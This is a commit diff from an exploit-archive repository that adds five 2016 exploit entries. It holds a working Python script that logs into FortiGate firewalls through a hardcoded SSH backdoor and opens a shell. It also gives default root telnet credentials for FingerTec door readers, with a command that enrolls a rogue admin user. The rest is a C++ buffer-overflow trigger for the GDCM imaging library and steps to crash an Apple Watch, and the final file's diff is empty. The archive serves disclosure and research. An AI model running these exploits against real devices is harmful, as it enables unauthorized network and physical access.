DB: 2016-01-13

Offensive Security · Offensive Security · commit cecdd9a52780 · 2016-01-13T05:04:32.000Z
5 new exploits
diff --git a/files.csv b/files.csv
@@ -35399,6 +35399,8 @@ id,file,description,date,author,platform,type,port
 39145,platforms/cgi/webapps/39145.txt,"Xangati XSR And XNR 'gui_input_test.pl' Remote Command Execution Vulnerability",2014-04-14,"Jan Kadijk",cgi,webapps,0
 39146,platforms/php/webapps/39146.txt,"Jigowatt PHP Event Calendar 'day_view.php' SQL Injection Vulnerability",2014-04-14,"Daniel Godoy",php,webapps,0
 39147,platforms/osx/local/39147.c,"Apple Mac OS X Local Security Bypass Vulnerability",2014-04-22,"Ian Beer",osx,local,0
+39225,platforms/hardware/dos/39225.txt,"Apple watchOS 2 - Crash PoC",2016-01-12,"Mohammad Reza Espargham",hardware,dos,0
+39227,platforms/hardware/remote/39227.txt,"FingerTec Fingerprint Reader - Remote Access and Remote Enrollment",2016-01-12,"Daniel Lawson",hardware,remote,0
 39150,platforms/php/webapps/39150.txt,"Open Audit SQL Injection Vulnerability",2016-01-02,"Rahul Pratap Singh",php,webapps,0
 39151,platforms/lin_x86-64/shellcode/39151..c,"x86_64 Linux bind TCP port shellcode",2016-01-02,Scorpion_,lin_x86-64,shellcode,0
 39152,platforms/linux/shellcode/39152..c,"TCP Bindshell with Password Prompt - 162 bytes",2016-01-02,"Sathish kumar",linux,shellcode,0
@@ -35469,3 +35471,6 @@ id,file,description,date,author,platform,type,port
 39221,platforms/win64/dos/39221.txt,"Adobe Flash - Use-After-Free When Setting Stage",2016-01-11,"Google Security Research",win64,dos,0
 39222,platforms/multiple/remote/39222.txt,"Foreman Smart-Proxy Remote Command Injection Vulnerability",2014-06-05,"Lukas Zapletal",multiple,remote,0
 39223,platforms/php/webapps/39223.txt,"ZeusCart 'prodid' Parameter SQL Injection Vulnerability",2014-06-24,"Kenny Mathis",php,webapps,0
+39224,platforms/hardware/remote/39224.py,"FortiGate OS Version 4.x - 5.0.7 - SSH Backdoor",2016-01-12,operator8203,hardware,remote,22
+39229,platforms/linux/dos/39229.cpp,"Grassroots DICOM (GDCM) 2.6.0 and 2.6.1 - ImageRegionReader::ReadIntoBuffer Buffer Overflow",2016-01-12,"Stelios Tsampas",linux,dos,0
+39230,platforms/linux/local/39230.c,"Linux Kernel overlayfs - Local Privilege Escalation",2016-01-12,halfdog,linux,local,0
diff --git a/platforms/hardware/dos/39225.txt b/platforms/hardware/dos/39225.txt
@@ -0,0 +1,25 @@
+#[+] Title:  Apple watchOS - Remote Crash Exploit
+#[+] Product: Apple
+#[+] Vendor: www.apple.com
+#[+] SoftWare Link : www.apple.com/watchos-2/
+#[+] Vulnerable Version(s): watchOS on IOS 9.0.1
+#
+#
+# Author      :   Mohammad Reza Espargham
+# Linkedin    :   https://ir.linkedin.com/in/rezasp
+# E-Mail      :   me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
+# Website     :   www.reza.es
+# Twitter     :   https://twitter.com/rezesp
+# FaceBook    :   https://www.facebook.com/reza.espargham
+
+
+#  1. open your phone Clock / goto Alarm
+# 2. add alarm / set time [for example two minutes later]
+# 3. click label /  input 5000 x “0"
+# 4. Save
+# 5. Lock Your phone and wait for alarm
+# 6. When the alarm clock rings / Watch Crashed ;)
+
+
+
+
diff --git a/platforms/hardware/remote/39224.py b/platforms/hardware/remote/39224.py
@@ -0,0 +1,77 @@
+#!/usr/bin/env python
+
+# SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7
+# Usage: ./fgt_ssh_backdoor.py <target-ip>
+
+import socket
+import select
+import sys
+import paramiko
+from paramiko.py3compat import u
+import base64
+import hashlib
+import termios
+import tty
+
+def custom_handler(title, instructions, prompt_list):
+    n = prompt_list[0][0]
+    m = hashlib.sha1()
+    m.update('\x00' * 12)
+    m.update(n + 'FGTAbc11*xy+Qqz27')
+    m.update('\xA3\x88\xBA\x2E\x42\x4C\xB0\x4A\x53\x79\x30\xC1\x31\x07\xCC\x3F\xA1\x32\x90\x29\xA9\x81\x5B\x70')
+    h = 'AK1' + base64.b64encode('\x00' * 12 + m.digest())
+    return [h]
+
+
+def main():
+    if len(sys.argv) < 2:
+        print 'Usage: ' + sys.argv[0] + ' <target-ip>'
+        exit(-1)
+
+    client = paramiko.SSHClient()
+    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
+
+    try:
+        client.connect(sys.argv[1], username='', allow_agent=False, look_for_keys=False)
+    except paramiko.ssh_exception.SSHException:
+        pass
+
+    trans = client.get_transport()
+    try:
+        trans.auth_password(username='Fortimanager_Access', password='', event=None, fallback=True)
+    except paramiko.ssh_exception.AuthenticationException:
+        pass
+
+    trans.auth_interactive(username='Fortimanager_Access', handler=custom_handler)
+    chan = client.invoke_shell()
+
+    oldtty = termios.tcgetattr(sys.stdin)
+    try:
+        tty.setraw(sys.stdin.fileno())
+        tty.setcbreak(sys.stdin.fileno())
+        chan.settimeout(0.0)
+
+        while True:
+            r, w, e = select.select([chan, sys.stdin], [], [])
+            if chan in r:
+                try:
+                    x = u(chan.recv(1024))
+                    if len(x) == 0:
+                        sys.stdout.write('\r\n*** EOF\r\n')
+                        break
+                    sys.stdout.write(x)
+                    sys.stdout.flush()
+                except socket.timeout:
+                    pass
+            if sys.stdin in r:
+                x = sys.stdin.read(1)
+                if len(x) == 0:
+                    break
+                chan.send(x)
+
+    finally:
+        termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)
+
+
+if __name__ == '__main__':
+    main()
diff --git a/platforms/hardware/remote/39227.txt b/platforms/hardware/remote/39227.txt
@@ -0,0 +1,23 @@
+# Exploit Title: Default Root Password and Remote Enrollment on FingerTec Devices 
+# Date: 12-01-2016 
+# Exploit Author: Daniel Lawson 
+# Contact: http://twitter.com/fang0654 
+# Website: https://digital-panther.com 
+# Category: physical access control 
+
+1. Description 
+
+Almost all FingerTec Access Control devices are running with open telnet, with a hardcoded default root password. Additionally, it is trivial to enroll a new administrative user on the device with a pin code or RFID card that will allow opening the door. 
+
+2. Proof of Concept 
+
+Login to telnet with the credentials: root / founder88 
+At the console type in the command: 
+echo -n -e \\\\x39\\\\x5\\\\x6\\\\x31\\\\x32\\\\x33\\\\x34\\\\x35\\\\x48\\\\x61\\\\x78\\\\x78\\\\x30\\\\x72\\\\x0\\\\x0\\\\x0\\\\x0\\\\x0\\\\x0\\\\x0\\\\x1\\\\x0\\\\x0\\\\x39\\\\x5\\\\x0\\\\x0 >> user.dat 
+This will create a user named Haxx0r with an id of 1337 and a pin of 12345. 
+--- 
+
+Daniel Lawson 
+Digital Panther Security 
+https://digital-panther.com 
+
diff --git a/platforms/linux/dos/39229.cpp b/platforms/linux/dos/39229.cpp
@@ -0,0 +1,89 @@
+/*
+Grassroots DICOM (GDCM) is a C++ library for processing DICOM medical
+images.
+It provides routines to view and manipulate a wide range of image formats
+and can be accessed through many popular programming languages like Python,
+C#, Java and PHP.
+
+GDCM versions 2.6.0 and 2.6.1 (and possibly previous versions) are prone
+to an
+integer overflow vulnerability which leads to a buffer overflow and
+potentially to remote code execution. The vulnerability is triggered by the
+exposed function gdcm::ImageRegionReader::ReadIntoBuffer, which copies
+DICOM
+image data to a buffer. ReadIntoBuffer checks whether the supplied
+buffer is
+large enough to hold the necessary data, however in this check it fails to
+detect the occurrence of an integer overflow, which leads to a buffer
+overflow
+later on in the code. The buffer overflow will occur regardless of the
+size of
+the buffer supplied to the ReadIntoBuffer call.
+
+More information about this vulnerability can be found at
+http://census-labs.com/news/2016/01/11/gdcm-buffer-overflow-imageregionreaderreadintobuffer/
+
+The GDCM project has released version 2.6.2 that addresses this issue.
+It is advised to upgrade all GDCM installations to the latest stable
+release.
+
+Disclosure Timeline
+-------------------
+CVE assignment:    December 2nd, 2015
+Vendor Contact:    December 4th, 2015
+Vendor Patch Release: December 23rd, 2015
+Public Advisory: January 11th, 2016
+*/
+
+#include "gdcmReader.h"
+#include "gdcmImageReader.h"
+#include "gdcmImageRegionReader.h"
+#include "gdcmBoxRegion.h"
+#include "gdcmImageHelper.h"
+
+#include <iostream>
+
+using namespace std;
+
+/*
+ * A simple demonstration of CVE-2015-8396
+ * by Stelios Tsampas (stelios at census-labs.com)
+ * based on http://gdcm.sourceforge.net/html/ExtractImageRegion_8cs-example.html
+ *
+ * Compiles with:
+ * $ g++ -I/usr/include/gdcm-2.6 -o CVE-2015-8396-trigger CVE-2015-8396-trigger.cpp -lgdcmCommon -lgdcmMSFF -lgdcmDSED
+ *
+ * Try it on http://census-labs.com/media/CVE-2015-8396.dcm.bz2
+ *                https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39229.zip
+ * $ bzip2 -d CVE-2015-8396.dcm.bz2
+ * $ ./CVE-2015-8396-trigger CVE-2015-8396.dcm
+ */
+
+int main(int argc, char *argv [])
+{
+	char buffer[2048 * 2047];
+	gdcm::ImageRegionReader reader;
+	gdcm::BoxRegion box;
+
+	if (argc < 2) {
+		cout << "Usage: example <input-file>\n";
+		return 1;
+	}
+
+	const char *filename = argv[1];
+	reader.SetFileName(filename);
+	
+	if (!reader.ReadInformation()) {
+		cout << "No info from file\n";
+		return 1;
+	}
+
+	std::vector<unsigned int> dims = gdcm::ImageHelper::GetDimensionsValue(reader.GetFile());
+	cout << "x: " << dims[0] << ", y: " << dims[1] << ", z: " << dims[2] << "\n";
+
+	box.SetDomain(0, dims[0] - 1, 0, dims[1] - 1, 0, dims[2] - 1);
+	reader.SetRegion(box);
+	reader.ReadIntoBuffer(buffer, sizeof(buffer));
+	
+	return 0;
+}
diff --git a/platforms/linux/local/39230.c b/platforms/linux/local/39230.c
